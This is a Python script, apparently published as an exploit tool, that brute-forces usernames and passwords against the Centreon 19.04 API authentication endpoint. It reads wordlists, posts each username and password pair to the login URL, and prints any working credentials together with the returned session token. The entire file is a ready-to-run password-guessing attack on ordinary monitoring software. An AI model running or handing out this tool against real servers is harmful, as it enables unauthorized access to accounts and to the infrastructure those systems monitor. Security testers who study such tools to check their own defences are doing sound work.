#!/usr/bin/env python3 # Tested on Centreon API 19.04.0 # Centreon 19.04 - Login Password Bruteforcer # Written on 6 Nov 2019 # Referencing API Authentication of the Centreon API document # Author: st4rry # centbruteon.py # Centreon Download Link: https://download.centreon.com/#version-Older # Dependencies: sys, requests, argparse, termcolor, os import sys import requests import argparse from termcolor import colored import os def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', dest='host', help='Define your target URL', required=True) parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80) parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP') parser.add_argument('-l', dest='username', help='Specific username') parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist') parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True) parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification') parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle') if len(sys.argv) == 1: parser.print_help(sys.stderr) sys.exit(1) args = parser.parse_args() protocol = 'https' if args.https else 'http' server = f"{protocol}://{args.host}:{args.port}" user = args.username passfile = args.passwfile.read().splitlines() userfile = args.userfile dirlo = '/centreon/api/index.php?action=authenticate' verify_ssl = not args.insecure if args.ca_bundle: verify_ssl = args.ca_bundle if user: brute_force_single_user(server, user, passfile, dirlo, verify_ssl) elif userfile: usrwl = userfile.read().splitlines() brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl) else: print(colored('Something went wrong!', 'red')) sys.exit(1) def brute_force_single_user(server, user, passfile, dirlo, verify_ssl): for password in passfile: data = {'username': user, 'password': password} r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) try: print('Processing...') print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(user, 'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow')) if r.status_code == 200: print(colored('Credentials found: username: ', 'green') + colored(user, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green')) print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) print('\n') break else: print(colored('403 - Unauthenticated!', 'red')) except IndexError: print(colored('Something went wrong', 'red')) def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl): for usr in usrwl: for password in passfile: data = {'username': usr, 'password': password} r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) try: print('Processing...') print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(usr, 'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow')) if r.status_code == 200: print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green')) print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) print('\n') else: print(colored('403 - Unauthenticated!', 'red')) except IndexError: print(colored('Something went wrong', 'red')) if __name__ == '__main__': main()